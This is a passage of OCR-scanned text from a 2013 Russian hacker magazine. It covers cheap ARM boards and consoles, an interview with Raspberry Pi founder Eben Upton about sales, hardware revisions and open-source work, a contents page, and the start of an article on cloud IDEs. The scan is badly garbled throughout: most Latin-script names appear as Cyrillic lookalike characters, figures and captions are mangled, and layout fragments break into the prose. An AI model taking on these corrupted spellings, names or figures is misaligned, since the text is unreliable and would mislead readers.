(ТЕ-\АВ702М/ТЕ-МВАЗ020/Т-МВЗ040) 

Умельцы достаточно быстро сообразили, что малень- 
кий роутер, способный питаться от телефонной зарядки 
и имеющий УЗВ-разъем, — отличная железка для всяких 
необычных гаджетов. Причем по сравнению с ВРГстоит это 
дело копейки: самый дешевый роутер (ТЕ-\МВ702М) мож- 
но найти за 500 рублей, а самый дорогой (ТЕ-МРЗ040) — 
за 1200 рублей. В самой дорогой модельке есть встроен- 
ная батарея на 2000 мА : ч, что, согласись, тоже приятно. 
Прошивается все это дело стандартным Ореп\МРТ. Конеч- 


но, это более хардкорный путь, чем ВР! (сообщество намного меньше), но найти железку 
проще, а стоит она в разы меньше. 


ИГРЫ: ОЦУА 

Конечно, советовать устройство, которое только вышло в про- 
дажу, стремновато. Но у ОЦ\УА есть отличный потенциал в каче- 
стве правильной игровой приставки. Во-первых, чипсет ММОТА 
Теога 3, а во-вторых, собственный джойстик. В-третьих, раз- 
работчики радуют здравыми идеями — например обещают, 
что не будут блокировать эмуляторы в фирменном магазине. 
Кроме того, любовь создателей к движку Ипйу ЗО (ты ведь чи- 
тал материал в ноябрьском номере про разработку инди-игр?) 
и другим хорошим вещам означает, что превратиться из игрока 
в разработчика станет как никогда просто. 


ЗАМЕНА ДЕСКТОПА: 
ООВО!О-Х2 

Каждый раз, когда создате- 
ли ВР! говорят, что «малиной» 
можно пользоваться в каче- 
стве настольника, где-то в этом 
мире умирает котенок. Но если 
и есть АВМ-комп, который по- 
дошел бы для такой задачи, 
то это ОРАОШ-Х2. Четырехъядерный процессор, два гига 
оперативки, шесть портов УЗВ 2.0, возможность использо- 
вания более быстрой карты еММС. Железка довольно доро- 
гая (например, в Москве она обойдется в 8500 рублей, плюс 
придется еще довольно долго искать еММС-карту и другие 
навороты), но для кого-то в этом может быть смысл — на та- 
кой системе уже можно пользоваться полноценной Убищи. 
Строго говоря, стоит все удовольствие как неплохой неттоп, 
поэтому решай сам, есть ли какой-то смысл заморачивать- 
ся именно ради АНМ. И не исключено, что та же ОЦ\А в итоге 
окажется более удачной альтернативой. = 


Интервью 
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СПУСТЯ 


—— ЭБЕН АПТОН 


ОСНОВАТЕЛЬ НАЗРВЕВНУ РГЕОЧМОВАПОМ 


И ТЕХНИЧЕСКИЙ ДИРЕКТОР КОМПАНИИ ВВОАБСОМ 


В 2012 году Эбен и его команда на- 
деялись продать тысячу Назрбеггу 
Р! студентам Кембриджа. Однако 
как только начался предзаказ, все 
устройства разошлись через час. 

И попали они не столько студентам, 
сколько гикам со всего мира. Мы 
поговорили с создателем ВР! о том, 
как это повлияло на проект. 


ПРЕДНАЗНАЧЕНИЕ НВАЗРВЕВВУ Р! 


ВазрЬеггу РГ совершенно не нужен школам — он нужен детям. 
В этом заключается вся наша идея: он спроектирован для лич- 
ного пользования. Лично я программирую с десяти лет и де- 
лаю это уже двадцать пять лет. Господи, какой я старый! Я поч- 
ти при смерти! Мне исполнилось тридцать пять, а я все еще 
программирую по четыре часа каждый вечер. И именно благо- 
даря такому подходу я вообще умею программировать. 

Мы говорили со школами об обучении программированию. 
В лучшем случае школа может выделить на это один-два часа 
в неделю. Никто не станет хорошим программистом за два 
часа в неделю. Потому что нужно иметь компьютер в своей 
комнате. Конечно, у многих сегодня есть ПК, однако у многих 
его по-прежнему нет. В Британии, как и в России, у многих лю- 
дей вообще нет компьютеров, зато есть телевизоры. 


Идея заключалась в том, чтобы создать машину, на которой 
можно программировать по четыре часа по вечерам. Она долж- 
на была быть очень дешевая и прочная. ОЧЕНЬ дешевая! 
Даже если ты сломал ее, какая разница? Это не то же самое, 
что сломать !Раа, если ты наступил на него или спаял что-то 
не так. Пошел синий дымок? Ну и ладно. Потому что можно 
просто купить новую. 

ВВС Мг!сго, безусловно, стал для нас источником вдохновения. 
Мы понимали, что если мы создадим компьютер стоимостью 
25-35 долларов, которому потребуются дополнительные 
устройства еще на 100 долларов, которых у вас нет, значит, мы 
не справились со своей задачей. 

Мы намеренно стараемся использовать обычные мышки и кла- 
виатуры и от силы пару специальных вещей. Ведь множество 
железа просто выбрасывают. К примеру, если ты школьник, 
то, может быть, фирма одного из родителей учеников собира- 
ется избавиться от старых клавиатур и мышек. Возможности 
огромны. Даже если у тебя есть старый телевизор с обычным 
композитным разъемом, можно использовать металлическую 
вешалку вместо кабеля :). 

Вначале мы уделяли больше внимания программному обеспе- 
чению и больше сосредотачивались на общей оптимизации. По- 
жалуй, та платформа, что была у нас раньше, действительно 
подходила для образовательных целей. 

Но потом мы увидели, как опытные пользователи приспоса- 
бливают нашу разработку, чтобы проигрывать видео, запускать 
на ней браузеры, использовать инфраструктуру Чама. Часто на ВР! 
делают различные, чисто служебные, сетевые инструменты 
с узким функционалом. В общем, сейчас Разреггу использу- 
ется в куда более сложных и требовательных проектах, чем мы 
предполагали исходно, когда работали над «образовательным 
компьютером». 


ФАКТЫ 


Окончил Кембриджский 
университет, бакалавр 
физики и машино- 
строения, также облада- 
етдипломом Кембриджа 
по вычислительной 
технике и имеет степень 
доктора наук. 


Выступал одним из осно- 
вателей игровой студии 
|Чеамок$30, атакже 
работал в ВМ. 


Автор ряда статей и даже 
книг (к примеру, Охога 
Впутио Отспопагу, на- 
писанный в соавторстве 

с отцом — Клайвом 
Аптоном). 


зо Интервью 


Сейчас наша аудитория делится примерно 70/30: 70% опыт- 
ных пользователей и 30% приходится на сферу образова- 
ния — точнее сказать сложно. Мы можем говорить о географи- 
ческом положении людей, но не о демографических группах. 
Но вот такое впечатление складывается от того, что мы видим 
в интернете. 

Полагаю, часть аудитории делает медиацентры, то есть они 
не относятся напрямую к опытным пользователям и необяза- 
тельно плотно работают с устройством (хотя для обучения 
они его также не используют). Это люди, которые используют 
АР! для управления ХВМС. Они, конечно, с чем-то ковыряют- 
ся, занимаются каким-то «хакингом», но в основном это поль- 
зователи, а не хакеры. Обычных пользователей больше, чем 
программистов. 

Если 700 тысяч пользователей из миллиона мы можем назвать 
опытными пользователями, то остается еще 300 тысяч пользовате- 
лей в сфере образования. И это гораздо больше, чем мы когда- 
либо планировали. Очень здорово, что мы вышли на больший 
рынок, чем изначально предполагали, а теперь находимся 
на еще большем рынке и остаемся там. 

Хорошо и то, что опытные пользователи вносят свою лепту. 
Они не только берут. В первые три месяца у нас было два-три 
человека, предлагающих очень тривиальные 10-строчные 
патчи, маленькие изменения к исходному коду ядра. Но поз- 
же начался стремительный рост числа патчей. Если взять об- 
раз ВазрЫап от апреля 2012 года и сравнить его с августом 
2012-го, то станет очевидно, сколько всего сделали пользова- 
тели, — лучшее тому доказательство. 


«ЖЕЛЕЗНАЯ» СТОРОНА ДЕЛА 


За все время было выпущено примерно шесть разных версий плат. 
Первая версия была на базе микроконтроллера Анте! АТтесда. 
В 2006 году также была модификация, основанная на ките 
Вгоаасот для разработчиков. Тогда у нас и появилось назва- 
ние Назрбеггу Р!; на ней мы запустили РУПоп. 

Была еще версия, очень маленькая, она демонстрировалась 
на видео с Дэвидом в мае 2011 года. Эта малюсенькая машинка 
едва ли сравнится с настоящим Вазррегту Р!, но на нее можно 
было поставить Шпих. 

Позже, в августе 2011 года, у нас появились альфа-платы, 
и они уже были крутыми. С точки зрения электроники это была 
почти финальная версия. Такие платы были всего у пятидесяти 
человек. Сейчас это уже антиквариат, и одна такая есть у меня. 
Я, кстати, могу нажать на кнопку в Вгоаасот и сделать еще 
десять таких плат, если захочу обеспечить себе беззаботную 
пенсию :). 

Конечно, если спустя год оглядываться назад, я бы многое сде- 
лал иначе. К примеру, хотелось бы сразу настроить УЗВ. Мы 
скоро решим этот вопрос, но лучше бы все было отрегулиро- 
вано с самого начала. 

Выяснилось, что пользователи сталкиваются с множеством 
ограничений нашего У$В-стека. Так что сейчас это самое при- 
оритетное направление для нас. Предполагалось, что ЧЗВ- 
порты РазрЬеггу будут использоваться только для подключе- 
ния клавиатур и мышек, но это было наивно с нашей стороны. 
Нам пришлось много работать над производительностью и ста- 
бильностью, куда больше, чем предполагалось изначально. 
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Мы уже внесли в У$В ряд изменений. На сегодняшний день 
большинство УЗВ-устройств работают правильно. Запомина- 
ющие устройства для УЗВ работают хорошо, сетевые устрой- 
ства тоже. Были некоторые проблемы с веб-камерой и некото- 
рыми экзотичными мышками и клавиатурами, но с ними почти 
справились. Старые устройства с УЗВ 1.0 тоже функциониру- 
ют нормально. 

Вообще, за последние пару месяцев мы обновили версию 
драйвера Зупор$у$. Зупорзу$ производит референсные драй- 
веры — не то чтобы очень подробные, правда. У нас есть куча 
маленьких патчей, предложенных сообществом, для устра- 
нения проблем вроде утечек памяти, проблем с совместным 
доступом (сопсштепсу ргоет5), гасе сопаоп$. В ядре Ипих 
предусмотрено три контекста прерываний, и все они работа- 
ют вместе, поэтому возникает множество конфликтов и со- 
стояний гонки. Например, в архитектуре АВМ предусмотрено 
два типа прерываний: 1ВО, ЕО. Но в Ипих НО не использует- 
ся. К счастью, мы научились переносить наиболее критичные 
по времени выполнения операции на РО. 

В целом, полагаю, чип для ВР! мы исходно выбрали пра- 
вильный. И дело не только в том, что я работаю на Вгоаасот 
(хотя я по-прежнему сотрудник Вгоаасот, они наняли меня 
для Гоипаайоп как постоянного сотрудника). Просто не думаю, 
что с учетом нашей цены удалось бы выбрать что-нибудь луч- 
ше. Тем более у альтернативных чипов было бы хуже с мульти- 
медиа. Так что это был хороший выбор. 

Кстати, в этом году мы планируем выпустить немного обнов- 
ленную версию платы. Изменения будут небольшие. Мы хотим 
доработать потребление питания. У нас есть ЧЗВ-разъемы 
с одной стороны платы, но они слишком сильно выступают, по- 
этому мы их немного утопим. Вы не представляете, как тяжело 
это сделать, но так все будет выглядеть намного симпатичнее. 
Некоторые другие разъемы тоже выступают, и ихтрудно поме- 
стить в корпус. Поэтому мы хотим немного «пожонглировать» 
разъемами. В общем, что-то изменить в этом году мы плани- 
руем, но изменения будут несущественные. 

Также сейчас в Уэльсе уже создается камера. Мы уже зака- 
зали несколько десятков тысяч штук, и, думаю, камеры будут 
иметь успех. 

Но, возвращаясь к вопросу энергопотребления, хочу пояснить. 
Сейчас входное напряжение на 5 В преобразовывается с по- 
мощью [ОО в 3,3 В. Мы надеемся, что сумеем генерировать 
3,3 В более эффективно: может быть, с помощью импульс- 
ного источника питания. Здесь все зависит от стоимости, 
на которую мы по-прежнему обращаем внимание. (ОО можно 
увидеть на плате, это очень большое и толстое 1ОО (помечен 
как НС2 на плате. — Прим. ред.). Если сделать инфракрасную 
фотографию, то [ОО на ней будет мигать, как маячок. Мы хо- 
тим это исправить. Только на это уходит 300 мВТ, а это боль- 
шая разница, ведь это можно было бы подать на ЧЗВ-порт и 
подключить более скоростное устройство. Плюс плата будет 
меньше греться. Ну и конечно, нам нужно научиться работать 
с дешевыми блоками питания. Сейчас, если блок питания ра- 
ботает нестабильно, это приводит к сложностям в работе всей 
платы. В общем, пока мы сконцентрировались на небольших 
нюансах — внешних устройствах на плате, но не на ее «вну- 
тренностях», не на архитектуре. 

Безусловно, все это занимает много времени. Ведь это разра- 
ботка, мы должны найти хорошее техническое решение. Нам при- 
ходится обсуждать все с производителями компонентов, что- 


бы отыскать достаточно дешевые варианты. Чтобы проделать 
всю эту работу с питанием, нам придется сэкономить на чем- 
то еще. Но у нас в запасе имеется пара хороших трюков, чтобы 
сэкономить по 50 центов с каждой платы, и мы сможем потра- 
тить эти деньги на улучшение питания. 

Но все же было бы неплохо вернуться в день первого запуска. 
Если бы тогда мы знали наши нынешние объемы, то знали бы, 
что делать. Я хотел бы сразу использовать 512 Мб оперативной 
памяти, потому что это оказалось не так дорого. Жаль, что мы 
не поставили ГЕО наН}]-45. У нас вместо этого есть ЕВ на пла- 
те, но, если надеть корпус, его не видно. 

В общем, сейчас я изменил бы простые вещи, а не какие-то на- 
вороты. Хотелось бы поставить большой конденсатор куда-то 
еще. Люди его постоянно задевают большим пальцем, когда 
отключают шнур питания. Помню историю с Доном Коббли, 
одним из наших инженеров. В декабре 2011-го мы делали ма- 


Дэвид Бребен, член 
ВазрЬеггу РРРоипааНоп 
исоздатель игры Ее 
с ранним прототипом 
ВазрЬе!ггуР! 


ХАКЕР 05 /172/ 2013 Год спустя 


ленькую партию плат геу. 1 (их собирали вручную в Англии). 
Я дал одну плату Коббли, и через пять минут он позвонил 
мне и сказал: «Ну что, у меня отломался конденсатор». Хотя 
у него все еще есть плата, он пользуется ей уже полтора года 
без проблем. 


ОРЕМ (И НЕ ОЧЕНЬ) ЗОУВСЕ 


Мы работаем над несколькими опенсорсными проектами, ока- 
зываем им финансовую поддержку, сотрудничаем с ними на тех- 
ническом уровне. Примеры таких проектов: \М/ауапа, \\№Шез{оп 
(композитный менеджер \М/ауапа), Рихтар, Зацеак (диалект 
Зташа). Пока это все, но я полагаю, что многое будет де- 
латься и вокруг РУПоп, вокруг взаимодействия с другими 
платформами. Все эти проекты поддерживает Назрбеггу Р! 
РоипааНоп, поскольку они требуются опытным пользователям. 

С Ореп Зоигсе придется взаимодействовать очень тесно. 
Большая аудитория принесла нам дополнительные сред- 
ства, но, поскольку речь идет об энтузиастах и хакерах, мы 
оказались вынуждены вернуть значительную часть денег со- 
обществу. 

Но, упомянув М/ауап, нельзя не сказать о Х $егуег. Конеч- 
но, было бы неплохо иметь ускорение Х, СХ и прочие удоб- 
ные вещи для Х. С другой стороны, \М/ауапа — это движение 
в правильном направлении. Если вам ни к чему сетевая про- 
зрачность, то \\ауапа — то, что нужно. Плюс надо учитывать, 
что у нас ограниченны ресурсы, то есть нам приходится фоку- 
сироваться на чем-то одном. Опять-таки у нас мало графиче- 
ского софта, с которым нужно поддерживать совместимость. 
Нет никакой «пятилетней программы для Х», которую должны 
иметь пользователи НР. 

Словом, у нас нет старого ПО и ресурсы ограниченны. Если 
бы у нас было два варианта и мы могли бы позволить себе 
вкладываться только в Х или только в \ММауапа, выбор в пользу 
\М/ауапа был бы куда логичнее. Люди, которые работают у нас 
над этим направлением, действительно самые лучшие. И эти 
люди оказывают огромное влияние на проект (\М/ауапа). 

Недавно я видел скриншоты и надеюсь получить демоверсию 
на этой неделе. Мы добавим \М/ау!апа в новую сборку Вазрап... 
В М/ауапа вообще будет работать все основное, чтобы люди 
могли понять, чем мы занимаемся. Пока это будет просто дем- 
ка для технических пользователей. Надеюсь, в следующие 3-4 
месяца нам удастся заставить ее работать. Мы сделаем все, 
что нужно, — 30 в окне приложения, 20 в окне приложения, 
улучшим интерфейс. Выберем топ-10 приложений, которы- 
ми пользуются люди, и займемся их допиливанием, вплоть 
до МтесгаН. Добьемся стабильности работы, и в конце концов 
\Мау!апа станет нашим стандартным десктопом. 

Тестируем мы только на версии ВазрЬап с включенной опти- 
мизацией для нашего математического сопроцессора (пага Ноа). 
В остальные дистрибутивы наработки вносятся разработчика- 
ми этих проектов. Очевидно, что двумя крупнейшими проекта- 
ми являются Гедога и Агсп. 

Конечно, я не могу не сказать и о аудиокодеке ОТ$. Думаю, 
ОТ$ у нас будет, но не знаю этого точно и не хочу загады- 
вать на будущее. Я обсуждаю этот вопрос с ОТ5, но мы пока 
не пришли к соглашению. Надеюсь, мы его получим. На теку- 
щем чипе у нас есть О$ЗР для декодирования, и мы уже про- 
делали с ним кое-какую работу. И... да, эта ситуация довольно 
сильно раздражает. 

Пока ОТ$ просто отключен, потому что у нас нет лицензии. 
Мы работаем над этим изо всех сил. Можно сказать, что ме- 
диацентрам не хватает только вот этой небольшой детали. 
Хотя еще было бы неплохо улучшить поиск по треку. Сейчас 
можно только перепрыгивать вперед и назад. Но в целом, ког- 
да у нас будет ОТ$, все должно пойти гораздо лучше. Дело 
в том, что мы хотим все сделать легально. Хоть сейчас можно 


ПРОТОТИПОВ 
КАЗРВЕВЕ\ Р! 
БЫЛО СОЗДАНО 
ДО ПОЯВЛЕНИЯ 
ФИНАЛЬНОЙ 
ВЕРСИИ 


Я дал одну плату из ранних ревизий Дону 
Коббли, и через пять минут он позвонил 
мне и сказал: «Ну что, у меня уже 


отломался конденсатор» 


получить устройства, проигрывающие ОТ$, но мы страдаем 
от того, что хотим все сделать «по-белому». 

Мы не можем открыть драйверы к видеоускорителю — это ре- 
шение Вгоадсот. Я продолжаю спорить и обсуждать это с ними 
и надеюсь, что делаю это не зря. Вообще, уже существуют 
проекты по реверс-инжинирингу, так что секретов практиче- 
ски не осталось. Да и я не верю, что интеллектуальной соб- 
ственности Вгоаасот что-то угрожает. Однако это решение 
Вгоаасот, а не мое. Они делают то, что считают нужным. На- 
деюсь, мы сможем как-то на них повлиять. 

Когда мы выпустили исходники прошивки в прошлом году, ре- 
акция была смешанной. Многие нас критиковали за драйверы к 
видеоускорителю, но многие отреагировали позитивно, в том 
числе и люди, к которым я отношусь с большим уважением. 
Но в целом нас это все немного деморализовало. Лично я за- 
думался: почему я это делаю, зачем я столько работаю? 

У нас в компании Вгоадсот по вечерам и выходным работало 
много волонтеров, чтобы завершить этот релиз. Множество лю- 
дей тратили свое свободное время, а в итоге большинство 
из них осталось недовольно. Мы делаем все, что в наших си- 
лах. Поэтому всегда, когда я встречаюсь с компанией, я под- 
нимаю шум по этому поводу, возможно впустую, не знаю. 
Технология не такая уж и новая, в целом этот чип давно ис- 
пользуется. Надеюсь, со временем мы сможем что-нибудь 
с этим сделать. 

Р! Зфоге, можно сказать, пока не оправдал ожиданий. Впро- 
чем, мы всегда знали, что это займет некоторое время. Сей- 
час я просто считаю, что это займет больше времени, чем мы 
предполагали. 

Разумеется, нам интересно стать большой платформой 
для бесплатных приложений. Если посмотреть на РГ Зоге 
и на какой-нибудь Сооде Рау или Арр Зтоге, они движутся 
в разных направлениях. Для одних это коммерческое направ- 
ление, для других бесплатное. Мы остановимся на бесплат- 
ном. Если дети хотят иметь игровое ПО, нужно дать им такую 
возможность. 

Мы ищем возможности добавить больше самых разных вещей 
в З4оге. Мы планируем разработать какой-нибудь слой совме- 
стимости с одной из мобильных платформ. Тогда будет легче 
переносить мобильный контент. Надеюсь, это поможет. Мы 
надеемся, что больше людей будут делать пакеты открытого 
ПО и добавлять их в З{оге. Тогда можно будет просто дважды 
кликнуть и получить программу. Я был бы очень рад, если бы 
у нас были тысячи приложений, но пока их лишь 60 или 70. 
Но мы работаем над этим, потому что хотим, чтобы у детей был 
больший выбор. 


32 Интервью 


ВАЗРВЕВВУ Р! РЕОУМОАТ!ОМ 


ВазрБеггу Р! РоипдаНоп — это пять попечителей, что-то вроде со- 
вета директоров организации. Она нанимает людей и владеет 
100% бизнеса. Так нам велели поступить юристы. В Британии 
если у тебя есть некоммерческая организация, которая зани- 
мается чем-то помимо сбора денег (в нашем случае торгует), 
то ты должен создать другую компанию, которая будет при- 
надлежать этой НКО. Вот такая у нас структура. 

У нашей благотворительной организации пять попечителей, 
у компании пять директоров. В Разрбеггу РГРГоипЧаНоп работает 
два человека, в компании четверо — у них общий офис. 

Плюс у нас есть несколько фрилансеров. Есть парень по име- 
ни Бен Эвисон, он очень талантливый программист на ассем- 
блере (автор порта ЗС О$ на ВазрЬеггу Р!. — Прим. ред.). Мы 
наняли его как фрилансера. Есть еще один парень по имени 
Тим Релендж из Ванкувера, Канада. Он работает над диалек- 
том ЗтаШа и средой разработки Эсгасй. На ЗтаЩаК детей 
обучают программированию. Тим много работал над ЗЭсгасп 
(если быть точным — над ее виртуальной машиной), которая 
там используется. 

Также несколько человек работают на нас на контрактной осно- 
ве для поддержания боод!е+ и Еасебоок. Еще один специальный 
человек связывает нас с людьми на Ерау, нарушающими ав- 
торские права. Потому что очень важно защищать свою тор- 
говую марку. Я знаю, как это происходит в России, но в Бри- 
тании, если не защищать свою торговую марку, ее попросту 
заберут. 

Что интересно, два специалиста по социалкам — женщины. 
У них обеих есть маленькие дети, и они совмещают работу 
с уходом за ними. Это отличный способ работать с очень- 
очень умными людьми: нужно дать им гибкие условия труда. 
В противном случае эти люди никогда не стали бы работать 
на тебя, потому что должны присматривать за детьми. 


ВВС Мгсго —идей- 

ный вдохновитель 
ВазрЬеггу Р!и популяр- 
нейший компьютер 80-х 


00 
000 


УСТРОЙСТВ 
ПРОДАНО ПО 
ВСЕМУ МИРУ, 
ПО ОЦЕНКАМ 

АПТОНА 


Если учитывать традиции компьютер- 
ных исследований и технических разрабо- 
ток в России, то мы должны продавать 


у вас просто миллионы ВРЕ:) 
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Словом, на фрилансе у нас 
в любой момент времени тру- 
дится семь-восемь человек. 
Сейчас, возможно, восемь 
или девять, потому что у нас 
есть пара дополнительных со- 
трудников, которые пришли 
к нам от наших бизнес-пар- 
тнеров. 


ПРОДАЖИ 


Главное в ВР! — это то, что он ве- 
сит около 42 граммов. Значит, 
коробка НР! весит два кило- 
грамма, так что ее очень легко 
перемещать, верно? 

На сегодня уже продано око- 
ло 1,1-1,2 миллиона ВазрБеггу 
Р!. Где-то в феврале был мил- 
лион. С того момента уже 
прошло больше месяца, а мы 
продаем по 100-200 тысяч 
в месяц. Самый большой наш 
рынок сейчас лежит в США. 
Традиционно продажи рас- 
пределялись так: 1/3 в Се- 
верной Америке, 1/3 в Брита- 
нии и 1/3 в остальном мире. 
Но сейчас Америка преобла- 
дает с большим отрывом. Там 
это работает по вирусному 
принципу: люди покупают НР!, показывают друзьям, друзьям 
нравится и — бац! Плюс мы широко представлены в медиа, 
и АР! есть во многих хакспейсах. (Здесь и далее данные 
только по одному из двух дистрибьюторов, Ргептег Еатей!. — 
Прим. ред.) 

Мы продали примерно 3 тысячи ВРЕв России. А суммарно 
на конец января было продано 900 тысяч устройств. Из про- 
данных позже 100 тысяч примерно половина ушла в Европу, 
примерно треть в США и Канаду. В итоге США и Канада дают 
нам примерно 300 тысяч проданных НР!. Европа — примерно 
400-500 тысяч. 

У нас есть определенный прогресс в России. Хотя, например, 
в Италии мы продали в два раза больше. 

Вообще, мы не рассчитывали продать в России ни одного 
ВР!. С другой стороны, когда смотришь, как много людей жи- 
вет в России, каковы традиции компьютерных исследований 
и технических разработок в России, наверное, мы должны 
продавать у вас просто миллионы НР! :). 

Сейчас мы собираемся «пойти» в Японию, хотим там закре- 
питься. Там мы пока не очень сильны, у них есть другие ре- 
бята. Но в Японии возник интерес к нам, поэтому нужно хоть 
немного развиться на этой территории. Мы пытаемся каждые 
пару месяцев. Есть желание продавать не только в Западной 
Европе и Северной Америке, но и в Бразилии, России, на Фи- 
липпинах — везде. 

Мы всегда возлагаем надежды на то, что местные дистрибью- 
торы купят ВР! и будут распространять его локально. Одна из про- 
блем в России как раз заключается в том, что при покупке ВР! 
он зачастую доставляется к вам из другой страны, но не про- 
дается перекупщиком внутри страны. Нам интересно, чтобы 
таких перекупщиков было больше, скажем, как в США. В Шта- 
тах дело обстоит так: можно купить ВРГу дилеров, а можно 
у перекупщиков, что делает рынок более конкурентным. Эти 
ребята не могут завышать цены, потому что конкурируют друг 
с другом. Нам нужно искать способы. В магазинах электрони- 
ки цена будет вдвое выше нашей, что заполнит пробел, но это 
будет плохо для нас. С этим мы обязательно что-нибудь сдела- 
ем, но это займет время. 

Одна из прекрасных особенностей работы с нашими дистри- 
бьюторами: они — глобальные компании. Даже когда все идет 
не идеально, когда приходится доплачивать, они все равно до- 
ступны. Ведь у нас своеобразный бизнес: мы не делаем ком- 
пьютеры, мы разрабатываем их, а потом лицензируем произ- 
водство. == 


ДВОЕ ИЗЛАРЦА 


На арену мобильных ОС выходит сразу два новых 
игрока отхорошо знакомых разработчиков: 
Орбита Тоисй и Егеюх О$. Мы уже немного гово- 
рили об эзотерических мобильных операционках 
в статье «Андердоги» в декабрьском номере, 

но с тех пор кое-что изменилось. Большой тройке 
операционок (Ю$, Апагою, М/паом/5 Рпопе) по- 
прежнему ничто не угрожает, но вот экосистема 
Апаго перешла на новый уровень. Ведь и Убиты, 
и Ягетох О$ — это не самостоятельные ОС, а над- 
стройки над Апагохга. И это может изменить путь, 
которым будет развиваться эта платформа. 


РОБОТНА ПОВОДКЕ 

АОВ — инструмент Апагоа, позволяющий под- 
ключиться к устройству по ЧЗВ и выполнять 
любые операции с ним. Это еще один способ 
добиться от «робота» того, что тебе хочется. 


Х-МОВШЕ 


РАБОТА НАД ОШИБКАМИ 

Закрывают Сооде Веаадег? Не расстраивайся. 
Мы знаем, как не наступить на эти грабли второй 
раз, — поднять собственный А$$-агрегатор 

на базе МемзВ\иг. 


РС2ОМЕ 


— 


Х-МОВИЕ — 


РС2ОМЕ 


В МИРЕ ЗАОБЛАЧНЫХ 1ОЕЙ 

Заниматься разработкой в браузере — инте- 
ресная идея, впервые прозвучавшая достаточно 
давно. Но дошли ли эти инструменты до нужного 
уровня? 


ЗЛОУМЫШЛЕННИКИ ВЫБИРАЮТ УАУА 
Предлагаем твоему вниманию самый подробный 
анализ дыр в платформе уа\ма. Настолько по- 
дробный, что иметь с ней дело ты уже не захо- 
чешь никогда. 


ПОКАЖИ ПРЯМО В БРАУЗЕРЕ! 

Если ты бываешь на айтишных конфах, ты навер- 

няка замечал, что джедаи не делают слайды в бо- 
гомерзком РомегРот+. Они делают их в любимом 
редакторе на НТМЕ, С$$ и Магкао\мт. 


МАЕГИ/АЛЕ 


ПРЯМОЙ РАСПИЛ РЕЕСТРА ММОО\М$ 
Вторгаемся в самое сердце \М/пао\$, не исполь- 
зуя вызовов \ЛИпАР!. Такой метод позволяет сде- 
лать с \Мтпао\м$ кучу всего, не светясь на радарах 
аверов. 
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Игорь Антонов 
апопо\.1аог.кКпу@дтай.сот 


Илья Курченко 
Кигспепко@геа!.хаКер.ги 


ВМИЕ 
ЗАОБ 
|ОЕЙ 


Обзор облачных Применение облачных ШЕ в корне меняет устоявшийся 
инст р ментов за годы процесс разработки программного обеспече- 

ния. Разработчику больше не нужна (в идеале) куча про- 
р 93 р абошки грамм, между которыми требуется налаживать связь, 


которые необходимо обновлять и с которыми приходит- 
ся выполнять другие рутинные действия. Но увы, мир 
облачной разработки еше нельзя назвать идеальным. 
Здесь есть свое черное и белое. 
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ТАКЛИ БЕЗУПРЕЧНЫ 

ОБЛАЧНЫЕ ОЕ 

Для начала поговорим о светлой стороне. 

Что принципиально нового нам несут 

облачные технологии и ОЕ вчастности? 

В первую очередь — смену устоявшихся 

паттернов. Для работы необходим только 

браузер и ничего больше. Ниверсия ОС, 
ни отсутствие специализированныхби- 
блиотек в системе не способны помешать 
работе. Браузер в этом мире играетроль 
главного проводника. Сейчас он мощная 
среда разработки, ачерез пять минут 
превращается в крохотный редактор 
регулярных выражений. 

Отношение к аппаратным ресурсам 
меняется аналогичным образом. Гонка 
производительности может быть нена- 
долго прервана, так как главным потре- 
бителем ресурсов становится опять-таки 
лишь браузер. Снабжать ресурсами мощ- 
ную среду разработки и все связанные 
с ней компоненты будет кто-то другой. 

Получается, наиболее вескими аргу- 
ментами «за» в отношении миграции в об- 
лако будут: 

1. Работа в любом месте и влюбое 
время. Главное, чтобы под рукой был 
компьютер/смартфон/планшет и до- 
ступ к интернету. 

2. Независимость от выбора ОС. Главное 
требование к операционной систе- 
ме — наличие браузера, поддержива- 
ющего современные веб-стандарты. 

3. Упрощение поддержки парка про- 
граммного обеспечения. Никакой 
софт не требует обновлений (раз- 
ве что браузер). Сам же процесс 
обновления ложится на удаленную 
сторону — облачного провайдера. 

4. Дополнительная безопасность ис- 
ходного кода. Весь исходный код про- 
ектов хранится в облаке, а не на рабо- 
чей машине очередного приходящего 
разработчика, который завтра может 
пропасть вместе со всеми своими 
и чужими наработками. 

5. Экономия локальных вычислительных 
ресурсов. Для ведения разработки 
не требуется рабочая станция с мощ- 
ным процессором и вагоном памяти. 

6. Гибкое управление рабочими местами 
разработчиков. Все проблемы, свя- 
занные с предоставлением доступа 
к определенным исходникам, разво- 
рачиванием нового рабочего места 
для очередного разработчика, реша- 
ются несколькими кликами мышкой. 


МИНУСЫ 
Положительных сторон облачного кодинга 
немало, но и минусов, увы, хватает. Самый 
главный из них — безопасность. Да, когда 
исходный код проектов доступен в любой 
точке мира — это круто, но все мы помним 
печальную историю с популярным ныне 
облачным сервисом Огорох. 

Из-за ошибки разработчиков злоу- 
мышленники могли получить беспрепят- 


ственный доступ к любому из аккаунтов 
пользователей. Представляешь, какие 
проблемы могут возникнуть, если такая 
ситуация случится с ШЕ, в которой рас- 
полагаются рабочие проекты? Мало того 
что исходники могут попасть в чужие 
руки, так еще и в мгновение ока ты мо- 
жешь потерять доступ к результатам сво- 
его труда. 

Несомненно, разработчики подобных 
продуктов следят за тенденциями в обла- 
сти защиты и отражения новых хакерских 
атак, но всем известна простая истина 
(читателям нашего журнала особенно): 
чем больше программа, тем больше в ней 
ошибок. От ошибок не застрахованы даже 
облака. 

Не совсем гладко обстоят дела 
с устойчивостью решений к сбоям и вне- 
запным падениям. Производители серви- 
сов дразнят покупателей хорошим аптай- 
мом, но на деле он не всегда так хорош. 
Стайн, Огорбох, Сооче ОВос$ — в истории 
каждого популярного облачного решения 
были замечены внезапные падения. Хоть 
ресурсы и были недоступны не больше 
двух часов, но что, если именно в эти два 
часа тебе нужно срочно получить доступ 
к файлам проекта? Я сомневаюсь, что ра- 
ботодателя/клиента, которому срочно 
требуется исправить ошибку в програм- 
ме, устроит ответ: «Извините, но наше 
облако сейчас недоступно, и мы никак 
не можем решить вашу проблему». 

Один из самых распространенных ми- 
фов облачных технологий — дешевизна. 
По своему опыту могу сказать, что облач- 
ное решение порой обходится дороже, 
чем покупка полноценного программного 
продукта. Аренда дешева, пока не требу- 
ется от нее отказываться и озадачиваться 
миграцией на альтернативное решение. 

Рассказывая о преимуществах облач- 
ных Е, я сделал особый акцент на воз- 
можность работы из любого места, глав- 
ное, чтобы был интернет и установлен 
современный браузер. Это реально кру- 
тая возможность, но давай рассмотрим 
обратную сторону медали. Если ты при- 
вык работать в разъездах, то для тебя 
не станет открытием проблема с досту- 
пом к Сети в небольших городах. 

Стоит отправиться в командировку 
